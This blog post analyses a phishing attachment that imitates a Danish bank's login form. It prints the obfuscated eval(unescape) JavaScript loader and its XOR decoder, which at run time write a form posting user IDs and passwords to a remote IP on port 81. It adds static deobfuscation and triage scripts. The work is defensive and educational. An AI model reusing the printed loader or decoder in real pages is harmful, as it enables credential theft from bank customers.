I want to “phish” Phishing-target bank customers Part 2

Moving on to part 2 of the analysis of the actual phishing e-mail, let’s see what the form can tell us…

So the form exists in an HTML file. The next step is to analyze this file. I'll open it with a text editor (Notepad++), since I do not yet know whether the file contains any malicious code, and look for anything potentially malicious in the HTML.

There is an odd-looking piece of JavaScript and an image hosted on a domain (www.hackedsite1.dk) which, at first sight, does not belong to the Phishing-target bank group's website.

First, I'll try to view the image in a sandboxed browser.
The image no longer exists.

Image no longer there

Secondly, I'll examine the odd-looking JavaScript.

Odd-looking JavaScript? Does that description really cover the JavaScript included in the code of the attached HTML file? No, it does not. This JavaScript contains obfuscated code.

“Obfuscation, in general, describes a practice that is used to intentionally make something more difficult to understand. In a programming context, it means to make code harder to understand or read, generally for privacy or security purposes. A tool called an obfuscator is sometimes used to convert a straight-forward program into one that works the same way but is much harder to understand.”

(http://searchsoftwarequality.techtarget.com/definition/obfuscation)

The person who sent this e-mail is certainly trying to make the code included in the HTML file harder to understand. But why? What does the code actually do? How can we find out?

These three questions will be answered once I de-obfuscate the JavaScript and see what it actually does. Before that, though, it is worth looking at which JavaScript functions the sender uses to obfuscate the code. At first sight the JavaScript is divided into two parts, both of which use the eval() and unescape() functions as well as the “+” operator.


<script type="text/javascript">
<!--
eval(unescape('%66%75%6e%63%74%69%6f%6e%20%73%61%64%35%63%36%35%30%36%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%32%35%33%30%33%30%37%39%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%36%38%39%34%35%39%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%36%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));

eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%73%61%64%35%63%36%35%30%36%28%27') + '%30%68%6b%6b%60%12%5c%5b%66%6a%6d%6d%3e%1a%6a%6c%69%6d%3c%2e%2f%23%3a%29%2d%27%2b%20%31%2d%2f%23%29%2b%3c%3b%2f%2c%61%75%6f%2b%64%6f%56%58%74%20%63%66%6f%15%1c%6f%5d%69%65%61%59%31%14%63%6d%68%67%1a%12%6b%6f%4a%67%5b%61%6b%67%33%19%65%59%66%6d%6b%6f%12%77%5d%6e%6a%5a%5e%67%59%2a%6c%65%64%65%24%1a%3025303079%36%38%32%37%37%38%37' + unescape('%27%29%29%3b'));
// -->
</script>

Odd-looking JavaScript

The unescape() function takes a string in which characters have been replaced by %XX (hexadecimal) escape sequences and returns the decoded string. It has been deprecated since JavaScript 1.5 because it does not handle non-ASCII characters correctly; decodeURIComponent() is the modern replacement (http://www.w3schools.com/jsref/jsref_unescape.asp, https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Functions). For example, the string “%66%75%6e%63%74%69%6f%6e” decodes to “function” (see also the ASCII table available at http://www.asciitable.com/).

Displaying JavaScript unescape() function

The eval() function evaluates a string as JavaScript code and executes any statements it contains (https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Functions#eval_Function, http://www.w3schools.com/jsref/jsref_eval.asp). So the snippet of code in the table below will produce an HTML page containing the text “Function evaluated correctly. Execution results to: 3”.

Demo JavaScript eval() function

<!DOCTYPE html>
<html>
<body>
<script>
var x = 30;
var y = 10;
var a = eval("x / y");
document.write("Function evaluated correctly. Execution results to: " + a);
</script>
</body>
</html>


The result of the code snippet is shown in the following image .

Result of the eval() demo page

The “+” operator, as used in the JavaScript code contained in the attached file, is the string concatenation operator: it joins separate snippets of JavaScript code into one string. In the code snippet in the table above, document.write("Function evaluated correctly. Execution results to: " + a); concatenates the two operands inside the parentheses, namely the literal “Function evaluated correctly. Execution results to: ” and the value of the variable a, giving “Function evaluated correctly. Execution results to: 3”.

The “+” operator is of course also JavaScript's arithmetic addition operator; whether it adds or concatenates depends on the types of its operands.

Finally, using eval() in combination with unescape() (“eval(unescape(...))”) means that the sender of the e-mail decodes the obfuscated code at run time, in the victim's browser, and then executes it; the readable code never appears in the file itself.

Now, having explained the obvious parts of the JavaScript code contained in the attached HTML file, let's try to decode it. To do that I will use the JSDetox JavaScript malware analysis tool (http://www.relentless-coding.com/projects/jsdetox/). JSDetox is a tool that supports the manual analysis of malicious JavaScript code. It runs its own web server on port 3000 (http://localhost:3000).

So I load the html attached file into JSDetox engine.

Loading attached html file into JSDetox engine

I have enabled the “execute eval” option, so that the eval() calls contained in the file's JavaScript are executed by JSDetox's analysis engine rather than by a browser. I click the “Extract scripts” button to extract the scripts included in the HTML file.

Extracting scripts contained within the attached html file

I click the “Execute” button and see that 3 actions are performed.

Actions executed by the scripts contained within the attached html file

As shown in the picture above, the HTML file contains one script. The script performs 3 actions: it executes the 2 eval() calls, which in turn lead to an emulated call to the document.write method, i.e. markup is written into the HTML document that contains the script (http://www.w3schools.com/jsref/met_doc_write.asp).

I click the “Show Code” button for each of the performed actions so that I can see the steps the JavaScript code goes through.

Execution of the eval() function nr. 1

Eval() function nr. 1 creates a function called sad5c6506() that takes one argument (variable s).

Code created by eval() function nr. 1

function sad5c6506(s) {
    var r = "";
    // "25303079" is a marker that separates the encoded body (tmp[0]) from the encoded key (tmp[1])
    var tmp = s.split("25303079");
    s = unescape(tmp[0]);
    // k is assigned without var, so it leaks into the global scope
    k = unescape(tmp[1] + "689459");
    for (var i = 0; i < s.length; i++) {
        // per byte: (one decimal digit of the key XOR the byte) + 6, the key digit cycling over k
        r += String.fromCharCode((parseInt(k.charAt(i % k.length)) ^ s.charCodeAt(i)) + 6);
    }
    return r;
}

Execution of eval() function nr. 2

Eval() function nr. 2 calls the document.write method in order to write into the HTML document. What it writes is the result of calling the function that eval() function nr. 1 created, namely sad5c6506(s), with an encoded string as its argument.

Code created by eval() function nr. 2

document.write(sad5c6506('%30%68%6b%6b%60%12%5c%5b%66%6a%6d%6d%3e%1a%6a%6c%69%6d%3c%2e%2f%23%3a%29%2d%27%2b%20%31%2d%2f%23%29%2b%3c%3b%2f%2c%61%75%6f%2b%64%6f%56%58%74%20%63%66%6f%15%1c%6f%5d%69%65%61%59%31%14%63%6d%68%67%1a%12%6b%6f%4a%67%5b%61%6b%67%33%19%65%59%66%6d%6b%6f%12%77%5d%6e%6a%5a%5e%67%59%2a%6c%65%64%65%24%1a%3025303079%36%38%32%37%37%38%37'));

Call to the document write.method

The sad5c6506(s) function decodes the encoded string into the opening tag of the form contained in the HTML file; in other words, the form only gets its action attribute at run time, so anyone (or any mail filter) reading the attachment as text sees no URL at all. The form's method is POST, which is used to request that the origin server accept the entity enclosed in the request as a new subordinate of the resource identified by the Request-URI in the Request-Line (http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html#sec9.5). In short, the user's input (the submitted form data) is sent to the script named in the action attribute, which processes it. That script usually resides on the same server as the form; here the form arrived as an e-mail attachment, so the action can point anywhere the phisher likes.

Result of sad5c6506(s) execution

<form action="http://xxx.xx.xx.143:81/nym/index.php" method="post" onSubmit="return validate(this)">
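The two eval(unescape(...)) layers discussed above, and the sad5c6506() decoder that JSDetox extracted, can be undone statically, without ever handing the attacker's string to eval() or letting document.write() touch a page. The script below is an added example written for this page in Node.js; it is not code from the original post or from the phishing kit. It decodes the opening of the first eval() string to recover the decoder's name, reimplements sad5c6506() with the legacy unescape() replaced by a small %XX decoder, and adds the inverse transformation so the decoder can be verified on a payload of our own. The sample payload encodes the form tag exactly as redacted above under a made-up key prefix ("31415"); it is a constructed test vector, not the string from the attachment, although feeding that string to the same function yields the form tag shown above.

```javascript
// Added example (not from the original post or the phishing kit): static
// de-obfuscation of the attachment's two eval(unescape(...)) layers without
// calling eval() or document.write(). Run with: node deobfuscate.js

// Stand-in for the legacy unescape(): decode %uXXXX and %XX escape sequences.
function percentDecode(str) {
  return str
    .replace(/%u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Layer 1: the first eval() only *defines* the decoder. Decoding the opening of
// its argument (copied from the attachment) shows the source without running it.
const LAYER1_OPENING = '%66%75%6e%63%74%69%6f%6e%20%73%61%64%35%63%36%35%30%36%28%73%29%20%7b';

// Constants of this particular kit: the marker that splits the encoded body
// from the encoded key prefix, and the fixed suffix appended to the key.
const MARKER = '25303079';
const KEY_SUFFIX = '689459';

// Faithful reimplementation of sad5c6506(): per byte,
// plaintext = (keyDigit XOR byte) + 6, the decimal key digit cycling over the key.
function sad5c6506(payload) {
  const [bodyEnc, keyEnc] = payload.split(MARKER);
  const s = percentDecode(bodyEnc);
  const k = percentDecode(keyEnc) + KEY_SUFFIX;
  let r = '';
  for (let i = 0; i < s.length; i++) {
    const keyDigit = parseInt(k.charAt(i % k.length), 10); // 0..9
    r += String.fromCharCode((keyDigit ^ s.charCodeAt(i)) + 6);
  }
  return r;
}

// Inverse of sad5c6506(), so we can build our own test vectors:
// byte = (char - 6) XOR keyDigit, %XX-encode every byte, then append the
// marker and the %XX-encoded key prefix, exactly as the kit lays it out.
function encodeLikeSad5c6506(plaintext, keyPrefix) {
  const k = keyPrefix + KEY_SUFFIX;
  const pct = (code) => '%' + code.toString(16).padStart(2, '0');
  let body = '';
  for (let i = 0; i < plaintext.length; i++) {
    const keyDigit = parseInt(k.charAt(i % k.length), 10);
    body += pct((plaintext.charCodeAt(i) - 6) ^ keyDigit);
  }
  let keyPart = '';
  for (const ch of keyPrefix) keyPart += pct(ch.charCodeAt(0));
  return body + MARKER + keyPart;
}

// Constructed sample: the form tag as redacted in the post, encoded under a
// made-up key prefix. This is NOT the string from the attachment.
const SAMPLE_FORM =
  '<form action="http://xxx.xx.xx.143:81/nym/index.php" method="post" onSubmit="return validate(this)">';
const SAMPLE_PAYLOAD = encodeLikeSad5c6506(SAMPLE_FORM, '31415');

console.log('layer 1 begins with :', percentDecode(LAYER1_OPENING));
console.log('constructed payload :', SAMPLE_PAYLOAD);
console.log('decoded             :', sad5c6506(SAMPLE_PAYLOAD));
```

The point of reimplementing rather than running the decoder is that the only thing eval() adds is the ability to execute whatever else the attacker hid in the string; the analysis copy contains no eval() at all. The marker "25303079" and the key suffix "689459" are constants of this kit, and another sample will use different ones, so they are the first things to read off a new variant.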

So the html code of the attached html file is the following.

Html file containing the result of the JavaScript code

The html file that was attached to the received e-mail is a phishing form.

Attached html file

The phishing form purports to be from Phishing-target Bank and asks for:

  • Bruger-id -> User ID
  • Adgangskode -> Password
  • Adgangskode2 -> Password2
  • E-mail

All of the above fields are mandatory. The values the user enters are sent to “http://xxx.xx.xx.143:81/nym/index.php”, i.e. they are processed by index.php, hosted in a directory called nym. The web server is located at xxx.xx.xx.143 and listens on port 81 (not a standard HTTP port), and the form posts over plain HTTP to a bare IP address; a bank's login form does neither. Hmm, now there is one more IP address to look at.
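The indicators that gave this attachment away, an eval(unescape(...)) layer, a document.write() that only becomes visible once the escapes are decoded, control bytes inside the percent-encoded string, and a form that posts over plain HTTP to a raw IP address on port 81, can all be checked without executing the script. The following is an added example written for this page in Node.js, not part of the original post; it runs those checks over a constructed sample shaped like the attachment. The IP address 203.0.113.143 (from the RFC 5737 documentation range) and the domain bank.example are placeholders for the redacted server address and the bank's real domain.

```javascript
// Added example (not from the original post): static triage of an HTML
// attachment for the indicators this analysis relied on. Plain string and
// URL checks only, no eval(). Run with: node triage.js

const STANDARD_PORT = { 'http:': '80', 'https:': '443' };

// Minimal stand-in for unescape(): decode %XX escape sequences.
const pctDecode = (str) =>
  str.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));

// Look at every single-quoted literal that contains %XX escapes. Two tells:
// 1. decoding it exposes a sink (document.write, eval) that a grep of the raw file misses;
// 2. control bytes (%00-%1f) in it mean the bytes are a transformed payload
//    (XOR-ed, shifted, ...) rather than merely escaped text.
function inspectEscapedLiterals(html) {
  const findings = [];
  for (const m of html.matchAll(/'([^']*%[0-9a-fA-F]{2}[^']*)'/g)) {
    const literal = m[1];
    const decoded = pctDecode(literal);
    if (/document\.write\s*\(|eval\s*\(/.test(decoded)) {
      findings.push(`sink hidden in escaped literal: ${decoded.slice(0, 20)}...`);
    }
    const control = (literal.match(/%[01][0-9a-fA-F]/g) || []).length;
    if (control > 0) {
      findings.push(`escaped literal with ${control} control bytes (transformed payload): ${literal.slice(0, 24)}...`);
    }
  }
  return findings;
}

// Where does each form post to, and does that look like the bank's own site?
// expectedHost is the domain the mail claims to come from.
function checkFormActions(html, expectedHost) {
  const findings = [];
  for (const m of html.matchAll(/<form\b[^>]*\baction\s*=\s*["']([^"']+)["'][^>]*>/gi)) {
    let url;
    try { url = new URL(m[1]); } catch (e) { continue; } // relative action: same origin as the page
    const port = url.port || STANDARD_PORT[url.protocol] || '';
    if (url.protocol !== 'https:') findings.push(`form posts over ${url.protocol.slice(0, -1)}, not https: ${m[1]}`);
    if (/^\d{1,3}(\.\d{1,3}){3}$/.test(url.hostname)) findings.push(`form posts to a raw IP address: ${url.hostname}`);
    if (port !== STANDARD_PORT[url.protocol]) findings.push(`form posts to non-standard port ${port}: ${m[1]}`);
    if (url.hostname !== expectedHost && !url.hostname.endsWith('.' + expectedHost)) {
      findings.push(`form host ${url.hostname} is not ${expectedHost}`);
    }
  }
  return findings;
}

function triageHtml(html, expectedHost) {
  const findings = [];
  if (/eval\s*\(\s*unescape\s*\(/.test(html)) findings.push('eval(unescape(...)) obfuscation layer present');
  findings.push(...inspectEscapedLiterals(html));
  findings.push(...checkFormActions(html, expectedHost));
  return findings;
}

// Constructed sample: an attachment shaped like the analysed one, with the form
// tag already written and a short eval(unescape) stub. 203.0.113.143 (RFC 5737
// documentation range) and bank.example stand in for the redacted IP address
// and the real bank domain.
const SAMPLE_HTML = `
<script type="text/javascript">
eval(unescape('%66%75%6e%63%74%69%6f%6e'));
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28') + '%30%68%6b%6b%60%12%5c%5b%66%6a%1a%30');
</script>
<form action="http://203.0.113.143:81/nym/index.php" method="post" onSubmit="return validate(this)">
<input name="Bruger-id"><input name="Adgangskode" type="password"></form>`;

const BANK_HOST = 'bank.example';

for (const f of triageHtml(SAMPLE_HTML, BANK_HOST)) console.log('[!] ' + f);
```

Note that a plain grep for document.write over the raw attachment finds nothing, because the call only exists as "%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28"; the literals have to be decoded one layer before the sink shows up. The control-byte check is the cheap way to tell "escaped text" from "encrypted blob": the second string in the attachment contains bytes such as %12, %1a and %15, which no printable page content would ever produce.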

Let's see. I call once again my favourite WHOIS service (http://whois.domaintools.com) and see that xxx.xx.xx.143 is located in Warsaw, Poland.

IP Information for xxx.xx.xx.143


QuickStats
IP Location:   Poland, Warsaw, xxxxxxxxxxxxxx
ASN:           AS43xxx xxxxx-AS xxxxxxxxxx, PL (registered Sep 11, 2007)
Whois Server:  whois.ripe.net
IP Address:    xxx.xx.xx.143

inetnum:        xxx.xx.xx.0 – xxx.xx.xx.255
netname:        xxxxxxxxxxxxx
descr:          xxxxxxxxxxxxxx
descr:          Axxxx.  xxx
descr:          00-xxx Warszawa
country:        PL
org:            ORG-DPJA1-RIPE
admin-c:        JJ16xx-RIPE
admin-c:        JA9xx-RIPE
tech-c:         DS14xxx-RIPE
tech-c:         JJ1xxx-RIPE
status:         ASSIGNED PI
mnt-by:         DCENTER-MNT
mnt-by:         RIPE-NCC-END-MNT
mnt-lower:      RIPE-NCC-END-MNT
mnt-routes:     DCENTER-MNT
mnt-domains:    DCENTER-MNT
source:         RIPE # Filtered

organisation:   ORG-DPJA1-RIPE
org-name:       xxxxxxxxxxxxxxxxxxxxxxx
org-type:       OTHER
address:        Axxxx xxx
address:        WARSZAWA
address:        Poland
phone:          +48 22 xxx xx xx
admin-c:        JA937-RIPE
tech-c:         JA9xx-RIPE
mnt-ref:        NETIA-MNT
mnt-by:         NETIA-MNT
source:         RIPE # Filtered

person:         Contact Person 3
address:        xxxxxxxxxxxx
address:        Warsaw, Poland
phone:          +48 602 xxxxxx
nic-hdl:        DS14145-RIPE
mnt-by:         WN-MNT
source:         RIPE # Filtered

person:         Contact Person 4
address:        xxxxxxxxxxxxx
address:        xxxxx xxx
address:        WARSZAWA
address:        POLAND
phone:          +48 (22) xxx xx xx
nic-hdl:        JA9xx-RIPE
mnt-by:         NETIA-MNT
source:         RIPE # Filtered

person:         Contact Person 5
address:        xxxxxxxxxxxxx
address:        Warsaw, Poland
phone:          +48 695 1xxxxx
nic-hdl:        JJ16xx-RIPE
mnt-by:         LPPL-MNT
source:         RIPE # Filtered

route:          xxx.xx.xx.0/24
descr:          xxxxxxxxxxxx
origin:         AS43xxx
mnt-by:         DCENTER-MNT
source:         RIPE # Filtered

WHOis information for xxx.xx.xx.143

Finally, is ” http://xxx.xx.xx.143:81/nym/index.php” still alive? As shown below, it is not.

Is http://xxx.xx.xx.143:81/nym/index.php still alive?

To conclude: we have an e-mail seemingly from a Danish bank, sent from Russia, containing a form that sends the entered data to a server in Poland. Does that sound legitimate? Certainly not!

So…lessons learned (simple users):

  • Banks do not inform us by e-mail that our card will be suspended.
  • Banks do not ask for our credentials, etc. by e-mail.
  • Phishing is easy to do and, with a little care, easy to identify.
  • Always talk to your bank (and certainly not on a phone number included in an e-mail) and stay vigilant.

And lessons learned (more advanced users)…

  • E-mail headers contain a lot of info. Know what to look for.
  • WHOIS is our friend. It tells us a lot.
  • Phishers / malware writers love obfuscation.
  • Obfuscated script in an e-mail attachment is almost always a sign of illicit activity. Legitimate sites minify their JavaScript too, but a bank does not mail you an HTML form whose action URL is decrypted at run time.

DISCLAIMER

This article is written for scientific purposes. It aims to:

  • educate simple users on how to identify phishing e-mails and what they should be careful of in order not to get phished and
  • educate more advanced users in phishers' techniques and how these can be analyzed.
